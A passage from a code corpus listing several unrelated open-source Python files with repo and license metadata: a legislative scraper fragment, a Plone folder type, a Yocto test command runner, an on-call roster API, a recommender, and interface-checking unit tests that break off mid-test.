"2006 First Extraordinary Session",
"2006 Second Extraordinary Session",
"2005 Regular Session",
"2005 First Extraordinary Session",
"2005 Second Extraordinary Session",
"2005 Third Extraordinary Session",
"2005 Fourth Extraordinary Session",
"2005 Fifth Extraordinary Session",
"2004 Regular Session",
"2004 First Extraordinary Session",
"2004 Second Extraordinary Session",
"2004 Third Extraordinary Session",
"2003 Regular Session",
"2002 Regular Session",
"2002 First Extraordinary Session",
"2002 Second Extraordinary Session",
"2002 Third Extraordinary Session",
"2001 Regular Session",
"2001 First Extraordinary Session",
"2001 Second Extraordinary Session",
"2000 Regular Session",
"2000 First Extraordinary Session",
"2000 Second Extraordinary Session",
"2000 Third Extraordinary Session",
"1999 Regular Session",
"1998 Regular Session",
"1997 Regular Session",
]
def get_session_list(self):
return url_xpath("http://billstatus.ls.state.ms.us/sessions.htm", "//a/text()")
| sunlightlabs/openstates | scrapers/ms/__init__.py | Python | gpl-3.0 | 8,618 |
# django-websockets doesn't have any models
| samuelcolvin/django-websockets | django_websockets/models.py | Python | mit | 44 |
# -*- coding: utf-8 -*-
#
# File: infofolder.py
#
# Copyright (c) 2016 by Bundesamt für Strahlenschutz
# Generator: ConPD2
# http://www.condat.de
#
__author__ = ''
__docformat__ = 'plaintext'
"""Definition of the InfoFolder content type. See infofolder.py for more
explanation on the statements below.
"""
from AccessControl import ClassSecurityInfo
from docpool.base.content.folderbase import FolderBase
from docpool.base.content.folderbase import IFolderBase
from plone.dexterity.content import Container
from Products.CMFPlone.utils import base_hasattr
from plone.supermodel import model
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import log
from Products.CMFPlone.utils import log_exc
from zExceptions import BadRequest
from zope.interface import implementer
class IInfoFolder(model.Schema, IFolderBase):
"""
"""
@implementer(IInfoFolder)
class InfoFolder(Container, FolderBase):
"""
"""
security = ClassSecurityInfo()
def createActions(self):
"""
"""
if base_hasattr(self, "myGroupFolder"):
log("Creating Private Info Folder")
placeful_wf = getToolByName(self, 'portal_placeful_workflow')
try:
self.manage_addProduct[
'CMFPlacefulWorkflow'
].manage_addWorkflowPolicyConfig()
except BadRequest as e:
log_exc(e)
config = placeful_wf.getWorkflowPolicyConfig(self)
placefulWfName = 'dp-private-infofolder'
config.setPolicyIn(policy=placefulWfName, update_security=False)
config.setPolicyBelow(policy=placefulWfName, update_security=False)
self.reindexObject()
self.updateSecurity()
self.reindexObjectSecurity()
def myInfoFolder(self):
"""
"""
return self
def getFirstChild(self):
"""
"""
fc = self.getFolderContents()
if len(fc) > 0:
return fc[0].getObject()
else:
return None
def getAllContentObjects(self):
"""
"""
return [obj.getObject() for obj in self.getFolderContents()]
def getInfoDocuments(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoDocument'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
def getInfoFolders(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoFolder'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
def getInfoLinks(self, **kwargs):
"""
"""
args = {'portal_type': 'InfoLink'}
args.update(kwargs)
return [obj.getObject() for obj in self.getFolderContents(args)]
| OpenBfS/dokpool-plone | Plone/src/docpool.base/docpool/base/content/infofolder.py | Python | gpl-3.0 | 2,843 |
# Copyright (c) 2013 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convienent way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
return result
def bitbake(command, ignore_status=False, timeout=None, **options):
if isinstance(command, basestring):
cmd = "bitbake " + command
else:
cmd = [ "bitbake" ] + command
return runCmd(cmd, ignore_status, timeout, **options)
def get_bb_env(target=None):
if target:
return runCmd("bitbake -e %s" % target).output
else:
return runCmd("bitbake -e").output
def get_bb_var(var, target=None):
val = None
bbenv = get_bb_env(target)
for line in bbenv.splitlines():
if line.startswith(var + "="):
val = line.split('=')[1]
val = val.replace('\"','')
break
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
| marcosbontempo/inatelos | poky-daisy/meta/lib/oeqa/utils/commands.py | Python | mit | 3,796 |
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from urllib.parse import unquote
from falcon import HTTPError, HTTPNotFound, HTTPBadRequest
from ujson import dumps as json_dumps
from ...auth import login_required, check_team_auth
from ... import db
from ...utils import load_json_body, invalid_char_reg
from .schedules import get_schedules
from ...constants import ROSTER_DELETED, ROSTER_EDITED
from ...utils import create_audit
def on_get(req, resp, team, roster):
"""
Get user and schedule info for a roster
**Example request**:
.. sourcecode:: http
GET /api/v0/teams/foo-sre/rosters HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"Managers": {
"id": 2730,
"users": [
{
"in_rotation": true,
"name": "foo"
}
],
"schedules": [
{
"auto_populate_threshold": 0,
"roster": "Managers",
"advanced_mode": 0,
"role": "manager",
"team": "foo-sre",
"events": [
{
"duration": 604800,
"start": 367200
}
],
"id": 1704
}
]
}
}
:statuscode 200: no error
"""
team, roster = unquote(team), unquote(roster)
connection = db.connect()
cursor = connection.cursor(db.DictCursor)
cursor.execute('''SELECT `roster`.`id` AS `roster`, `team`.`id` AS `team` FROM `roster`
JOIN `team` ON `team`.`id`=`roster`.`team_id`
WHERE `team`.`name`=%s AND `roster`.`name`=%s''',
(team, roster))
results = cursor.fetchall()
if not results:
raise HTTPNotFound()
team_id = results[0]['team']
roster_id = results[0]['roster']
# get list of users in the roster
cursor.execute('''SELECT `user`.`name` as `name`,
`roster_user`.`in_rotation` AS `in_rotation`,
`roster_user`.`roster_priority`
FROM `roster_user`
JOIN `user` ON `roster_user`.`user_id`=`user`.`id`
WHERE `roster_user`.`roster_id`=%s''', roster_id)
users = [user for user in cursor]
# get list of schedule in the roster
schedules = get_schedules({'team_id': team_id}, dbinfo=(connection, cursor))
cursor.close()
connection.close()
resp.body = json_dumps({'users': users, 'schedules': schedules})
@login_required
def on_put(req, resp, team, roster):
"""
Change roster name. Must have team admin privileges.
**Example request:**
.. sourcecode:: http
PUT /api/v0/teams/team-foo/rosters/roster-foo HTTP/1.1
Content-Type: application/json
{
"name": "roster-bar",
}
:statuscode 400: Invalid roster name, disallowed characters
:statuscode 422: Duplicate roster name for team
"""
team, roster = unquote(team), unquote(roster)
data = load_json_body(req)
name = data.get('name')
roster_order = data.get('roster_order')
check_team_auth(team, req)
if not (name or roster_order):
raise HTTPBadRequest('invalid roster update', 'missing roster name or order')
connection = db.connect()
cursor = connection.cursor()
try:
if roster_order:
cursor.execute('''SELECT `user`.`name` FROM `roster_user`
JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
JOIN `user` ON `roster_user`.`user_id` = `user`.`id`
WHERE `roster_id` = (SELECT id FROM roster WHERE name = %s
AND team_id = (SELECT id from team WHERE name = %s))''',
(roster, team))
roster_users = {row[0] for row in cursor}
if not all([x in roster_users for x in roster_order]):
raise HTTPBadRequest('Invalid roster order', 'All users in provided order must be part of the roster')
if not len(roster_order) == len(roster_users):
raise HTTPBadRequest('Invalid roster order', 'Roster order must include all roster members')
cursor.executemany('''UPDATE roster_user SET roster_priority = %s
WHERE roster_id = (SELECT id FROM roster WHERE name = %s
AND team_id = (SELECT id FROM team WHERE name = %s))
AND user_id = (SELECT id FROM user WHERE name = %s)''',
((idx, roster, team, user) for idx, user in enumerate(roster_order)))
connection.commit()
if name and name != roster:
invalid_char = invalid_char_reg.search(name)
if invalid_char:
raise HTTPBadRequest('invalid roster name',
'roster name contains invalid character "%s"' % invalid_char.group())
cursor.execute(
'''UPDATE `roster` SET `name`=%s
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `name`=%s''',
(name, team, roster))
create_audit({'old_name': roster, 'new_name': name}, team, ROSTER_EDITED, req, cursor)
connection.commit()
except db.IntegrityError as e:
err_msg = str(e.args[1])
if 'Duplicate entry' in err_msg:
err_msg = "roster '%s' already existed for team '%s'" % (name, team)
raise HTTPError('422 Unprocessable Entity', 'IntegrityError', err_msg)
finally:
cursor.close()
connection.close()
@login_required
def on_delete(req, resp, team, roster):
"""
Delete roster
"""
team, roster = unquote(team), unquote(roster)
check_team_auth(team, req)
connection = db.connect()
cursor = connection.cursor()
cursor.execute('SELECT `user_id` FROM `roster_user` JOIN `roster` ON `roster_user`.`roster_id` = `roster`.`id` '
'WHERE `roster`.`name` = %s AND `team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)',
(roster, team))
user_ids = cursor.fetchall()
cursor.execute('DELETE FROM `roster_user` WHERE `roster_id` = (SELECT `id` FROM `roster` WHERE `name` = %s '
'AND `team_id` = (SELECT `id` FROM `team` WHERE `name` = %s))', (roster, team))
if user_ids:
# Remove users from the team if needed
query = '''DELETE FROM `team_user` WHERE `user_id` IN %s AND `user_id` NOT IN
(SELECT `roster_user`.`user_id`
FROM `roster_user` JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
WHERE team_id = (SELECT `id` FROM `team` WHERE `name`=%s)
UNION
(SELECT `user_id` FROM `team_admin`
WHERE `team_id` = (SELECT `id` FROM `team` WHERE `name`=%s)))
AND `team_user`.`team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)'''
cursor.execute(query, (user_ids, team, team, team))
cursor.execute('''DELETE FROM `roster`
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `name`=%s''',
(team, roster))
deleted = cursor.rowcount
if deleted:
create_audit({'name': roster}, team, ROSTER_DELETED, req, cursor)
connection.commit()
cursor.close()
connection.close()
if deleted == 0:
raise HTTPNotFound()
| diegocepedaw/oncall | src/oncall/api/v0/roster.py | Python | bsd-2-clause | 7,890 |
# Test the module type
from test.test_support import verify, vereq, verbose, TestFailed
from types import ModuleType as module
# An uninitialized module has no __dict__ or __name__, and __doc__ is None
foo = module.__new__(module)
verify(foo.__dict__ is None)
try:
s = foo.__name__
except AttributeError:
pass
else:
raise TestFailed, "__name__ = %s" % repr(s)
# __doc__ is None by default in CPython but not in Jython.
# We're not worrying about that now.
#vereq(foo.__doc__, module.__doc__)
try:
foo_dir = dir(foo)
except TypeError:
pass
else:
raise TestFailed, "__dict__ = %s" % repr(foo_dir)
try:
del foo.somename
except AttributeError:
pass
else:
raise TestFailed, "del foo.somename"
try:
del foo.__dict__
except TypeError:
pass
else:
raise TestFailed, "del foo.__dict__"
try:
foo.__dict__ = {}
except TypeError:
pass
else:
raise TestFailed, "foo.__dict__ = {}"
verify(foo.__dict__ is None)
# Regularly initialized module, no docstring
foo = module("foo")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, None)
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": None})
# ASCII docstring
foo = module("foo", "foodoc")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, "foodoc")
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": "foodoc"})
# Unicode docstring
foo = module("foo", u"foodoc\u1234")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, u"foodoc\u1234")
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": u"foodoc\u1234"})
# Reinitialization should not replace the __dict__
foo.bar = 42
d = foo.__dict__
foo.__init__("foo", "foodoc")
vereq(foo.__name__, "foo")
vereq(foo.__doc__, "foodoc")
vereq(foo.bar, 42)
vereq(foo.__dict__, {"__name__": "foo", "__package__": None, "__doc__": "foodoc", "bar": 42})
verify(foo.__dict__ is d)
if verbose:
print "All OK"
| adaussy/eclipse-monkey-revival | plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_module.py | Python | epl-1.0 | 1,896 |
import numpy as np
import pickle
from scipy.spatial.distance import cosine
from numpy.linalg import norm
from scipy.sparse import csr_matrix
class Recommender:
keywords = None
content_vectors = None
user_preference_vectors = None
user_visited_content = None
USER_CONTENT_DUMP = 'user_content.dat'
KEYWORDS_DUMP = 'keywords_vec.dat'
CONTENT_VEC_DUMP = 'content_vec.dat'
USER_PREF_VEC_DUMP = 'user_pref_vec.dat'
def set_keywords(self, keywords_list):
self.keywords = keywords_list
pickle.dump(self.keywords, open(self.KEYWORDS_DUMP, "wb"))
def get_keywords(self):
if self.keywords is None:
try:
self.keywords = pickle.load(open(self.KEYWORDS_DUMP, "rb"))
except Exception:
self.keywords = []
return self.keywords
def get_content_vectors(self):
if self.content_vectors is None:
try:
self.content_vectors = pickle.load(open(self.CONTENT_VEC_DUMP, "rb"))
except Exception:
self.content_vectors = {}
return self.content_vectors
def get_user_preference_vectors(self):
if self.user_preference_vectors is None:
try:
self.user_preference_vectors = pickle.load(open(self.USER_PREF_VEC_DUMP, "rb"))
except Exception:
self.user_preference_vectors = {}
return self.user_preference_vectors
def get_user_visited_content(self):
if self.user_visited_content is None:
try:
self.user_visited_content = pickle.load(open(self.USER_CONTENT_DUMP, "rb"))
except Exception:
self.user_visited_content = {}
return self.user_visited_content
def save_user_preference_vector(self, user_preference_vectors):
self.user_preference_vectors = user_preference_vectors
pickle.dump(self.user_preference_vectors, open(self.USER_PREF_VEC_DUMP, "wb"))
def save_content_vectors(self, content_vectors):
self.content_vectors = content_vectors
pickle.dump(self.content_vectors, open(self.CONTENT_VEC_DUMP, "wb"))
def save_user_visited_content(self, user_visited_content):
self.user_visited_content = user_visited_content
pickle.dump(self.user_visited_content, open(self.USER_CONTENT_DUMP, "wb"))
def create_content_vector(self, content_keywords):
keywords = self.get_keywords()
content_vector = np.zeros(len(keywords))
for i, keyword in enumerate(keywords):
content_vector[i] = content_keywords.get(keyword, 0.0)
return content_vector
def add_content_vector(self, content_id, content_keywords):
content_vector = self.create_content_vector(content_keywords)
content_vectors = self.get_content_vectors()
content_vectors[content_id] = content_vector
self.save_content_vectors(content_vectors)
def update_user_preference_vector(self, user_id, content_keywords, content_id=None):
user_visited_content = self.get_user_visited_content()
preference_vectors = self.get_user_preference_vectors()
has_index = user_id in user_visited_content
if not has_index or content_id is None:
user_visited_content[user_id] = []
if content_id is not None:
user_visited_content[user_id].append(content_id)
user_pref_vec = []
content_vector = self.create_content_vector(content_keywords)
user_pref_vec.append(content_vector)
preference_vectors[user_id] = user_pref_vec
elif content_id not in user_visited_content[user_id]:
user_visited_content[user_id].append(content_id)
user_pref_vec = preference_vectors[user_id]
content_vector = self.create_content_vector(content_keywords)
user_pref_vec = np.add(user_pref_vec, content_vector) / 2
preference_vectors[user_id] = user_pref_vec
self.save_user_visited_content(user_visited_content)
self.save_user_preference_vector(preference_vectors)
def recommend(self, user_id):
recommendations = {'recommendations': []}
user_pref_vecs = self.get_user_preference_vectors()
if user_id in user_pref_vecs:
user_pref_vec = np.array(user_pref_vecs[user_id])
user_visited_content = self.get_user_visited_content()
for content_id, content_vec in self.get_content_vectors().iteritems():
if (user_pref_vec.sum() != 0.0) and (content_vec.sum() != 0.0) and str(content_id) not in user_visited_content[user_id]:
similarity = user_pref_vec.dot(content_vec) / (norm(user_pref_vec) * norm(content_vec))
print 'sim2: %f' % similarity
if similarity > 0.0:
recommendations['recommendations'].append({'globo_id': content_id, 'weight': similarity[0]})
return recommendations
| marcospy/hackathon-globo-app | recommender/recommender.py | Python | mit | 5,022 |
# Copyright 2017-2020 Kamil Sindi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import pytest
from implements import Interface, implements, get_mro
py36 = pytest.mark.skipif(sys.version_info < (3, 6), reason='requires py3.6')
def test_empty():
class FooInterface(Interface):
pass
@implements(FooInterface)
class FooImplementation:
pass
def test_with_args_kwargs():
class FooInterface(Interface):
def foo(self, a, *args, b=1, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, a, *args, b=7):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, *args, b=1, **kwargs):
pass
def test_with_kwarg_only():
class FooInterface(Interface):
def foo(self, a, *, b):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, a, b):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, *, b):
pass
def test_property():
class FooInterface(Interface):
@property
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
def test_property_inverse():
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
def test_setters():
class FooInterface(Interface):
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
def test_deleters():
class FooInterface(Interface):
@property
def foo(self):
pass
@foo.deleter
def foo(self, val):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.deleter
def foo(self, val):
pass
def test_implementation_implements_more_descriptors():
class FooInterface(Interface):
@property
def foo(self):
pass
# An implementation must implement all data descriptors defined in
# the interface, however, the implementation could define more.
#
# The case below must not generate errors because FooImplementationPass
# defines a foo.setter which isn't defined by FooInterface
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
def test_missing_method():
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self):
pass
def test_missing_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_renamed_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arrrrg):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_extra_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg, ument):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_different_defaults():
class FooInterface(Interface):
def foo(self, arg=7):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg=8):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg=7):
pass
def test_different_order():
class FooInterface(Interface):
def foo(self, a, b):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, b, a):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, b):
pass
def test_missing_kwargs():
class FooInterface(Interface):
def foo(self, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, **kwargs):
pass
def test_missing_property():
class FooInterface(Interface):
@property
def foo(self):
pass
with pytest.raises(NotImplementedError): # missing method
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass
with pytest.raises(NotImplementedError): # missing property decorator
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
def test_bad_constructor():
class FooInterface(Interface):
def __init__(self, a):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def __init__(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def __init__(self, a):
pass
def test_multiple_errors():
class FooInterface(Interface):
@property
def foo(self):
pass
def __init__(self, a):
pass
# Bad constructor, missing method getter, and missing class attribute (3)
match = r'^Found 3 errors in implementation:\n- .+\n- .+\n- .+\nwith .+'
with pytest.raises(NotImplementedError, match=match):
@implements(FooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def __init__(self):
pass
def test_static():
class FooInterface(Interface):
@staticmethod
def foo(a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass # missing foo
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
# skipcq: PYL-E0213
def foo(a, b, c): # missing staticmethod decorator
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail3: # skipcq: PYL-W0612
@classmethod # classmethod instead of staticmethod
def foo(cls, a, b, c): # decorator-check fails before signature
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail4: # skipcq: PYL-W0612
@staticmethod
def foo(m, n, o): # staticmethod, but wrong signature
pass
@implements(FooInterface)
class FooImplementationPass:
@staticmethod
def foo(a, b, c):
pass
def test_classmethods():
class FooInterface(Interface):
@classmethod
def foo(cls, a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass # missing foo
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
# skipcq: PYL-E0213
def foo(cls, a, b, c): # missing classmethod decorator
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail3: # skipcq: PYL-W0612
@staticmethod # staticmethod instead of classmethod
def foo(a, b, c): # decorator-check fails before signature
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail4: # skipcq: PYL-W0612
@classmethod
def foo(cls, m, n, o): # classmethod, but wrong signature
pass
@implements(FooInterface)
class FooImplementationPass:
@classmethod
def foo(cls, a, b, c):
pass
def test_classmethod_signature_match():
# For a classmethod, inspect.signature returns a signature with the first
# element (cls) stripped. A classmethod with signature (cls, a, b, c) has
# signature equivalence with a regular method with signature (a, b, c)
#
# Example:
from inspect import signature
class TestA:
@classmethod
def foo(cls, a, b, c):
pass
class TestB:
# skipcq: PYL-E0213
def foo(a, b, c):
pass
assert signature(TestA.foo) == signature(TestB.foo)
# The test below ensures that the above case is flagged
class FooInterface(Interface):
@classmethod
def foo(cls, a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
# skipcq: PYL-E0213
def foo(a, b, c):
pass
def test_staticmethod_classmethod_with_decorator():
class FooBarInterface(Interface):
@staticmethod
def foo(a, b, c):
pass
@classmethod
def bar(cls, a, b, c):
pass
import functools
def decorator(func):
@functools.wraps(func)
def inner(*args, **kwargs):
return func(*args, **kwargs)
return inner
@implements(FooBarInterface)
class FooBarImplementationPass:
@staticmethod
@decorator
def foo(a, b, c):
pass
@classmethod
@decorator
def bar(cls, a, b, c):
pass
def test_kwargs_only():
class FooInterface(Interface):
def foo(self, *, a):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementation:
def foo(self, a):
pass
def test_multiple_interfaces():
class FooInterface(Interface):
def foo(self):
pass
class BarInterface(Interface):
def bar(self):
pass
with pytest.raises(NotImplementedError):
@implements(BarInterface)
@implements(FooInterface)
class FooImplementationNoBar:
def foo(self, a):
pass
with pytest.raises(NotImplementedError):
@implements(BarInterface)
@implements(FooInterface)
class FooImplementationNoFoo:
def bar(self, a):
pass
@implements(BarInterface)
@implements(FooInterface)
class FooImplementation:
def foo(self):
pass
def bar(self):
pass
def test_interface_name_collision():
class Foo1Interface(Interface):
def foo(self):
pass
class Foo2Interface(Interface):
def foo(self):
pass
@implements(Foo2Interface)
@implements(Foo1Interface)
class FooImplementation:
def foo(self):
pass
def test_interface_name_and_signature_collision():
class Foo1Interface(Interface):
def foo(self):
pass
class Foo2Interface(Interface):
def foo(self) -> str:
return 'foo'
# Two interfaces with different signatures for a given method will
# always result in failure for the implementing class, as the
# implemented method's signature can only satisfy one of the interfaces.
with pytest.raises(NotImplementedError):
@implements(Foo2Interface)
@implements(Foo1Interface)
class FooImplementationFail:
def foo(self):
pass
def test_interface_inheritance():
class BaseInterface(Interface):
def bar(self):
pass
class FooInterface(BaseInterface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self):
pass
def bar(self):
pass
def test_class_inheritance():
class FooInterface(Interface):
def foo(self):
pass
@implements(FooInterface)
class ParentImplementation:
def foo(self):
pass
@implements(FooInterface)
class ChildImplementation(ParentImplementation):
pass
def test_class_multiple_inheritance():
# --------- INTERFACES -----------------------------------------------
#
class FooInterface(Interface):
def foo(self, final):
pass
class BarInterface(Interface):
def bar(self, final):
pass
class FooBarInterface(FooInterface, BarInterface):
pass
# --------- IMPLEMENTATION -------------------------------------------
#
class BaseFooImplementation: # must get overridden
def foo(self, override, my, args):
pass
@implements(FooInterface)
class FooImplementation(BaseFooImplementation):
def foo(self, final): # skipcq: PYL-W0221
pass
@implements(BarInterface)
class BarImplementation:
def bar(self, final):
pass
with pytest.raises(NotImplementedError):
@implements(FooBarInterface)
class SubFooImplementation(FooImplementation): # foo, no bar
pass
@implements(FooInterface)
@implements(BarInterface)
@implements(FooBarInterface)
class FooBarImplementation(FooImplementation, BarImplementation):
pass
def test_rtn_type_annotation():
class FooInterface(Interface):
def foo(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self) -> int:
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self) -> str:
pass
def test_arg_type_annotation():
class FooInterface(Interface):
def foo(self, arg: str):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg: int):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg: str):
pass
def test_other_decorator_compat():
def decorator(cls):
class Wrapper:
def __init__(self, *args):
self.wrapped = cls(*args)
def __getattr__(self, name):
print('Getting the {} of {}'.format(name, self.wrapped))
return getattr(self.wrapped, name, None)
return Wrapper
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
@decorator
class FooImplementationFail:
def __init__(self, x, y):
self.x = x
self.y = y
def foo(self):
pass
@decorator
@implements(FooInterface)
class FooImplementationPass:
def __init__(self, x, y):
self.x = x
self.y = y
def foo(self):
pass
def test_magic_methods():
class FooInterface(Interface):
def __add__(self, other):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
def __add__(self, other):
pass
def test_attributes():
class FooInterface(Interface):
a = None
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
a = 1
b = 2
def test_async():
class AsyncInterface:
async def __aenter__(self):
return self
async def __aexit__(self, *args, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncInterface)
class AsyncImplementation:
pass
def test_async_method():
class AsyncFooInterface:
async def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncFooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def foo(self):
pass
@implements(AsyncFooInterface)
class AsyncFooImplementation: # skipcq: PYL-W0612
async def foo(self):
pass
def test_generator():
class GenFooInterface:
def foo(self): # skipcq: PYL-R0201
yield 1
with pytest.raises(NotImplementedError):
@implements(GenFooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def foo(self):
pass
# must fail a generator which happens to be async
with pytest.raises(NotImplementedError):
@implements(GenFooInterface)
